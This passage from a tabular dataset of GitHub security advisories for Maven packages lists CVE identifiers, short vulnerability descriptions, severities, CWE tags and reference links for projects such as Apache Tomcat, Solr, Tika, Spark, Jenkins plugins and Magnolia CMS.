'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28164', 'http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html', 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210611-0006/', 'https://github.com/eclipse/jetty.project', 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'} | null |
Maven | GHSA-vx6f-6rp6-f2px | Cross-Site Request Forgery in Jenkins dbCharts Plugin | A cross-site request forgery (CSRF) vulnerability in Jenkins dbCharts Plugin 0.5.2 and earlier allows attackers to connect to an attacker-specified database via JDBC using attacker-specified credentials and to determine if a class is available in the Jenkins instance. | {'CVE-2022-25205'} | 2022-02-24T17:33:38Z | 2022-02-16T00:01:17Z | HIGH | null | {'CWE-352'} | {'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2177', 'https://github.com/jenkinsci/dbCharts-plugin', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25205'} | null |
Maven | GHSA-phg2-9c5g-m4q7 | Low severity vulnerability that affects org.apache.spark:spark-core_2.10 and org.apache.spark:spark-core_2.11 | In all versions of Apache Spark, its standalone resource manager accepts code to execute on a 'master' host, that then runs that code on 'worker' hosts. The master itself does not, by design, execute user code. A specially-crafted request to the master can, however, cause the master to execute code too. Note that this does not affect standalone clusters with authentication enabled. While the master host typically has less outbound access to other resources than a worker, the execution of code on the master is nevertheless unexpected.
# Mitigation
Enable authentication on any Spark standalone cluster that is not otherwise secured from unwanted access, for example by network-level restrictions. Use spark.authenticate and related security properties described at https://spark.apache.org/docs/latest/security.html | {'CVE-2018-17190'} | 2022-03-03T05:12:54.279201Z | 2018-11-21T22:19:30Z | CRITICAL | null | null | {'https://security.gentoo.org/glsa/201903-21', 'https://lists.apache.org/thread.html/341c3187f15cdb0d353261d2bfecf2324d56cb7db1339bfc7b30f6e5@%3Cdev.spark.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17190', 'http://www.securityfocus.com/bid/105976', 'https://github.com/advisories/GHSA-phg2-9c5g-m4q7'} | null |
Maven | GHSA-7rp6-w7mg-h8rw | XML External Entity Reference in Apache Jena | A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server. | {'CVE-2021-39239'} | 2022-03-03T05:14:16.163243Z | 2021-09-20T20:22:05Z | HIGH | null | {'CWE-611'} | {'https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45@%3Cdev.jena.apache.org%3E', 'https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39239', 'https://gitbox.apache.org/repos/asf?p=jena.git', 'https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d@%3Cdev.jena.apache.org%3E', 'https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d@%3Cannounce.apache.org%3E'} | null |
Maven | GHSA-7r83-w6r8-fh6w | Reflected Cross-site Scripting (XSS) in ACS Commons | ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful. | {'CVE-2021-21043'} | 2022-03-03T05:13:58.536484Z | 2021-05-13T22:31:14Z | MODERATE | null | {'CWE-79', 'CWE-787'} | {'https://helpx.adobe.com/security/products/indesign/apsb21-22.html', 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/commit/14d769c86606c4ce9a93c47a19f87e1ad72788d6', 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/security/advisories/GHSA-f92j-qf46-p6vm', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21043', 'https://github.com/Adobe-Consulting-Services/acs-aem-commons'} | null |
Maven | GHSA-567x-m4wm-87v8 | Infinite loop in Apache Tika | A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later. | {'CVE-2021-28657'} | 2022-04-22T16:02:00.405777Z | 2021-05-10T15:23:25Z | MODERATE | null | {'CWE-400', 'CWE-835'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-28657', 'https://lists.apache.org/thread.html/r915add4aa52c60d1b5cf085039cfa73a98d7fae9673374dfd7744b5a%40%3Cdev.tika.apache.org%3E', 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210507-0004/', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html'} | null |
Maven | GHSA-q2xp-75m7-gv52 | Moderate severity vulnerability that affects net.sf.robocode:robocode.api | Robocode through 1.9.3.5 allows remote attackers to cause external service interaction (DNS), as demonstrated by a query for a unique subdomain name within an attacker-controlled DNS zone, because of a .openStream call within java.net.URL. | {'CVE-2019-10648'} | 2022-03-03T05:13:20.114776Z | 2019-04-02T15:36:49Z | CRITICAL | null | {'CWE-20', 'CWE-862'} | {'https://sourceforge.net/p/robocode/bugs/406/', 'https://github.com/advisories/GHSA-q2xp-75m7-gv52', 'https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd#diff-0296a8f9d4a509789f4dc4f052d9c36f', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10648'} | null |
Maven | GHSA-8vmx-qmch-mpqg | High severity vulnerability that affects org.apache.tomcat.embed:tomcat-embed-core | When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/). | {'CVE-2019-0232'} | 2022-03-03T05:14:13.189737Z | 2019-04-18T14:27:35Z | HIGH | null | {'CWE-78'} | {'https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/', 'https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20190419-0001/', 'http://seclists.org/fulldisclosure/2019/May/4', 'https://lists.apache.org/thread.html/dd4b325cdb261183dbf5ce913c102920a8f09c26dae666a98309165b@%3Cnotifications.ofbiz.apache.org%3E', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2019-784', 'https://lists.apache.org/thread.html/673b6148d92cd7bc99ea2dcf85ad75d57da44fc322d51f37fb529a2a@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/f4d48b32ef2b6aa49c8830241a9475da5b46e451f964b291c7a0a715@%3Cdev.tomcat.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0232', 'https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html', 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/a6c87a09a71162fd563ab1c4e70a08a103e0b7c199fc391f1c9c4c35@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/52ffb9fbf661245386a83a661183d13f1de2e5779fa23837a08e02ac@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E', 'http://www.securityfocus.com/bid/107906', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://github.com/advisories/GHSA-8vmx-qmch-mpqg', 'https://access.redhat.com/errata/RHSA-2019:1712', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.synology.com/security/advisory/Synology_SA_19_17', 'https://lists.apache.org/thread.html/5f297a4b9080b5f65a05bc139596d0e437d6a539b25e31d29d028767@%3Cannounce.tomcat.apache.org%3E', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/', 'https://lists.apache.org/thread.html/96849486813a95dfd542e1618b7923ca945508aaf4a4341f674d83e3@%3Cnotifications.ofbiz.apache.org%3E', 'http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'} | null |
Maven | GHSA-2r2v-q399-qq93 | Request injection in Spring Cloud Gateway | Applications using Spring Cloud Gateway are vulnerable to specifically crafted requests that could make an extra request on downstream services. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.5+, 2.2.x users should upgrade to 2.2.10.RELEASE or newer. | {'CVE-2021-22051'} | 2022-03-03T05:13:47.828210Z | 2021-11-10T19:45:02Z | MODERATE | null | {'CWE-863', 'CWE-352'} | {'https://tanzu.vmware.com/security/cve-2021-22051', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22051'} | null |
Maven | GHSA-fm6q-97gw-c4wh | Secret exposure in Jenkins HashiCorp Vault Plugin | Jenkins HashiCorp Vault Plugin 3.8.0 and earlier implements functionality that allows agent processes to retrieve any Vault secrets for use on the agent, allowing attackers able to control agent processes to obtain Vault secrets for an attacker-specified path and key. | {'CVE-2022-25186'} | 2022-02-24T13:55:23Z | 2022-02-16T00:01:28Z | MODERATE | null | {'CWE-693'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-25186', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2429'} | null |
Maven | GHSA-qpwj-mvv7-v3m9 | High severity vulnerability that affects org.apache.cxf.fediz:fediz-spring and org.apache.cxf.fediz:fediz-spring2 | The application plugins in Apache CXF Fediz 1.2.x before 1.2.3 and 1.3.x before 1.3.1 do not match SAML AudienceRestriction values against configured audience URIs, which might allow remote attackers to have bypass intended restrictions and have unspecified other impact via a crafted SAML token with a trusted signature. | {'CVE-2016-4464'} | 2022-03-03T05:14:06.612774Z | 2018-10-18T16:57:10Z | HIGH | null | {'CWE-284'} | {'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E', 'https://git-wip-us.apache.org/repos/asf?p=cxf-fediz.git;a=commit;h=0006581e9cacbeef46381a223e5671e524d416b6', 'https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4@%3Ccommits.cxf.apache.org%3E', 'https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c@%3Ccommits.cxf.apache.org%3E', 'http://www.securityfocus.com/bid/92905', 'http://www.openwall.com/lists/oss-security/2016/09/08/20', 'https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E', 'https://github.com/advisories/GHSA-qpwj-mvv7-v3m9', 'http://www.securitytracker.com/id/1036869', 'http://cxf.apache.org/security-advisories.data/CVE-2016-4464.txt.asc', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4464', 'https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf@%3Ccommits.cxf.apache.org%3E', 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E'} | null |
Maven | GHSA-jh5g-9m4v-9vv9 | Insecure Java Deserialization in Apache Karaf | Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder). | {'CVE-2021-41766'} | 2022-03-03T05:13:25.812768Z | 2022-01-28T22:24:48Z | HIGH | null | {'CWE-502'} | {'https://karaf.apache.org/security/cve-2021-41766.txt', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41766', 'https://gitbox.apache.org/repos/asf?p=karaf.git;h=b42c82c', 'https://issues.apache.org/jira/browse/KARAF-7312', 'https://gitbox.apache.org/repos/asf?p=karaf.git;h=93a019c'} | null |
Maven | GHSA-q35p-chc6-7x57 | Moderate severity vulnerability that affects org.apache.storm:storm-core | Apache Storm version 1.0.6 and earlier, 1.2.1 and earlier, and version 1.1.2 and earlier expose a vulnerability that could allow a user to impersonate another user when communicating with some Storm Daemons. | {'CVE-2018-1332'} | 2022-03-03T05:13:33.924172Z | 2018-10-17T19:48:18Z | MODERATE | null | {'CWE-200'} | {'https://lists.apache.org/thread.html/50f1d6a7af27f49d2e498a9ab2975685302cd8ca47000b7c38f339a4@%3Cdev.storm.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1332', 'http://www.securityfocus.com/bid/104399', 'https://github.com/advisories/GHSA-q35p-chc6-7x57'} | null |
Maven | GHSA-hwcx-9p4j-7hwj | XML Entity Expansion in Pippo | XML Entity Expansion (Billion Laughs Attack) on Pippo 1.12.0 results in Denial of Service.Entities are created recursively and large amounts of heap memory is taken. Eventually, the JVM process will run out of memory. Otherwise, if the OS does not bound the memory on that process, memory will continue to be exhausted and will affect other processes on the system. | {'CVE-2019-5442'} | 2022-03-03T05:13:44.913599Z | 2019-06-13T20:22:30Z | HIGH | null | {'CWE-776'} | {'https://hackerone.com/reports/506791', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5442'} | null |
Maven | GHSA-xhcq-fv7x-grr2 | Critical severity vulnerability that affects org.apache.solr:solr-core | In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side. | {'CVE-2019-0192'} | 2022-03-03T05:13:08.040608Z | 2019-03-14T15:39:45Z | CRITICAL | null | {'CWE-502'} | {'https://access.redhat.com/errata/RHSA-2019:2413', 'http://www.securityfocus.com/bid/107318', 'https://lists.apache.org/thread.html/b0ace855f569c6b7a0b03ba68566e53b1a1a519abd536bf38978ce4a@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/ec9c572fb803b26ba0318777977ee6d6a2fb3a2c50d9b4224e541d5d@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E', 'http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0192', 'https://lists.apache.org/thread.html/42c5682f4acd1d03bd963e4f47ae448d7cff66c16b19142773818892@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/d0e608c681dfbb16b4da68d99d43fa0ddbd366bb3bcf5bc0d43c56d7@%3Cdev.lucene.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20190327-0003/', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/advisories/GHSA-xhcq-fv7x-grr2', 'https://lists.apache.org/thread.html/53e4744b14fb7f1810405f8ff5531ab0953a23dd09ce8071ce87e00d@%3Cdev.lucene.apache.org%3E'} | null |
Maven | GHSA-v2r2-7qm7-jj6v | Moderate severity vulnerability that affects org.springframework.security:spring-security-core | Spring Security versions 4.2.x prior to 4.2.12, 5.0.x prior to 5.0.12, and 5.1.x prior to 5.1.5 contain an insecure randomness vulnerability when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. In order to be impacted, an honest application must provide a seed and make the resulting random material available to an attacker for inspection. | {'CVE-2019-3795'} | 2022-03-03T05:12:35.991699Z | 2019-04-16T15:10:59Z | MODERATE | null | {'CWE-330', 'CWE-332'} | {'https://pivotal.io/security/cve-2019-3795', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3795', 'https://github.com/advisories/GHSA-v2r2-7qm7-jj6v', 'https://lists.debian.org/debian-lts-announce/2019/05/msg00026.html', 'http://www.securityfocus.com/bid/107802'} | null |
Maven | GHSA-w69w-jvc7-wjgv | Missing Authorization in undertow | undertow before version 2.0.23.Final is vulnerable to an information leak issue. Web apps may have their directory structures predicted through requests without trailing slashes via the api. | {'CVE-2019-10184'} | 2022-03-03T05:13:00.686204Z | 2019-08-01T19:18:16Z | HIGH | null | {'CWE-862'} | {'https://access.redhat.com/errata/RHSA-2019:2937', 'https://access.redhat.com/errata/RHSA-2019:2935', 'https://access.redhat.com/errata/RHSA-2019:2938', 'https://access.redhat.com/errata/RHSA-2019:2998', 'https://github.com/undertow-io/undertow/pull/794', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10184', 'https://access.redhat.com/errata/RHSA-2019:3050', 'https://access.redhat.com/errata/RHSA-2019:3044', 'https://access.redhat.com/errata/RHSA-2019:3045', 'https://access.redhat.com/errata/RHSA-2020:0727', 'https://access.redhat.com/errata/RHSA-2019:3046', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10184', 'https://security.netapp.com/advisory/ntap-20220210-0016/', 'https://access.redhat.com/errata/RHSA-2019:2936'} | null |
Maven | GHSA-65hp-4vxr-c356 | Arbitrary code execution in Magnolia CMS | An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted CSV/XLS file. | {'CVE-2021-46363'} | 2022-02-23T21:53:30Z | 2022-02-12T00:00:37Z | HIGH | null | null | {'https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory', 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46363-Formula%20Injection-Magnolia%20CMS', 'https://nvd.nist.gov/vuln/detail/CVE-2021-46363'} | null |
Maven | GHSA-4r64-wf76-c53p | In blynk-server a Directory Traversal exists | In blynk-server in Blynk before 0.39.7, Directory Traversal exists via a ../ in a URI that has /static or /static/js at the beginning, as demonstrated by reading the /etc/passwd file. | {'CVE-2018-17785'} | 2022-04-27T14:26:22Z | 2018-10-17T19:52:52Z | HIGH | null | {'CWE-22'} | {'https://github.com/blynkkk/blynk-server/issues/1256', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17785', 'https://github.com/blynkkk/blynk-server/releases/tag/v0.39.7', 'https://github.com/advisories/GHSA-4r64-wf76-c53p', 'https://github.com/blynkkk/blynk-server'} | null |
Maven | GHSA-mr8h-j9cv-4m8h | Server session is not invalidated when logout() helper method of Authentication module is used in Vaadin 18-19 | `Authentication.logout()` helper in `com.vaadin:flow-client` versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after the user attempted to log out.
- https://vaadin.com/security/cve-2021-31408 | {'CVE-2021-31408'} | 2022-03-03T05:13:36.099285Z | 2021-04-22T16:11:17Z | MODERATE | null | {'CWE-287', 'CWE-613'} | {'https://vaadin.com/security/cve-2021-31408', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31408', 'https://github.com/vaadin/flow/pull/10577', 'https://github.com/vaadin/platform/security/advisories/GHSA-mr8h-j9cv-4m8h'} | null |
Maven | GHSA-mm7m-xg4h-6m52 | Allocation of Resources Without Limits or Throttling in Apache Tika | A carefully crafted package/compressed file that, when unzipped/uncompressed yields the same file (a quine), causes a StackOverflowError in Apache Tika's RecursiveParserWrapper in versions 1.7-1.21. Apache Tika users should upgrade to 1.22 or later. | {'CVE-2019-10094'} | 2022-03-03T05:13:00.263383Z | 2019-08-06T01:43:35Z | HIGH | null | {'CWE-770'} | {'https://lists.apache.org/thread.html/39723d8227b248781898c200aa24b154683673287b150a204b83787d@%3Cdev.tika.apache.org%3E', 'https://lists.apache.org/thread.html/da9ee189d1756f8508d0f2386d8e25aca5a6df541739829232be8a94@%3Cdev.tika.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10094', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/fb6c84fd387de997e5e366d50b0ca331a328c466432c80f8c5eed33d@%3Cdev.tika.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/fe876a649d9d36525dd097fe87ff4dcb3b82bb0fbb3a3d71fb72ef61@%3Cdev.tika.apache.org%3E'} | null |
Maven | GHSA-99px-7724-484v | Remote Code Execution in Any23 | A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions < 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities. | {'CVE-2021-40146'} | 2022-03-03T05:12:30.143215Z | 2021-09-13T20:06:38Z | CRITICAL | null | null | {'https://nvd.nist.gov/vuln/detail/CVE-2021-40146', 'http://www.openwall.com/lists/oss-security/2021/09/11/2', 'https://lists.apache.org/thread.html/r7c521ed85c7ae1bad4fdf95b459f2aaa8a67eae338636b7b7ec35d86%40%3Cannounce.apache.org%3E', 'https://github.com/apache/any23'} | null |
Maven | GHSA-878w-7gxp-mc63 | SQL Injection in Spring Cloud Task | In applications using Spring Cloud Task 2.2.4.RELEASE and below, may be vulnerable to SQL injection when exercising certain lookup queries in the TaskExplorer. | {'CVE-2020-5428'} | 2022-03-03T05:13:07.394482Z | 2022-02-09T22:16:53Z | MODERATE | null | {'CWE-89'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-5428', 'https://tanzu.vmware.com/security/cve-2020-5428'} | null |
Maven | GHSA-36qh-35cm-5w2w | Authentication Bypass by Alternate Name in Apache Tomcat | A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. | {'CVE-2021-30640'} | 2022-03-03T05:14:13.437668Z | 2021-08-13T15:21:24Z | MODERATE | null | {'CWE-289', 'CWE-287'} | {'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread.html/r59f9ef03929d32120f91f4ea7e6e79edd5688d75d0a9b65fd26d1fe8%40%3Cannounce.tomcat.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210827-0007/', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://www.debian.org/security/2021/dsa-4952', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.debian.org/debian-lts-announce/2021/08/msg00009.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30640', 'https://www.debian.org/security/2021/dsa-4986'} | null |
Maven | GHSA-m4hg-5p2m-fm5m | Arbitrary code execution in Magnolia CMS | An issue in the Freemark Filter of Magnolia CMS v6.2.11 and below allows attackers to bypass security restrictions and execute arbitrary code via a crafted FreeMarker payload. | {'CVE-2021-46361'} | 2022-02-23T22:13:17Z | 2022-02-12T00:00:37Z | CRITICAL | null | null | {'https://nvd.nist.gov/vuln/detail/CVE-2021-46361', 'https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.12.html#_security_advisory', 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46361-FreeMarker%20Bypass-Magnolia%20CMS'} | null |
Maven | GHSA-hgpg-593r-hhvp | Cross-site Scripting in Keycloak | A flaw was found in Keycloak's data filter, in version 10.0.1, where it allowed the processing of data URLs in some circumstances. This flaw allows an attacker to conduct cross-site scripting or further attacks. | {'CVE-2020-10748'} | 2022-03-03T05:14:18.154149Z | 2022-02-09T00:56:37Z | MODERATE | null | {'CWE-79'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=1836786', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10748'} | null |
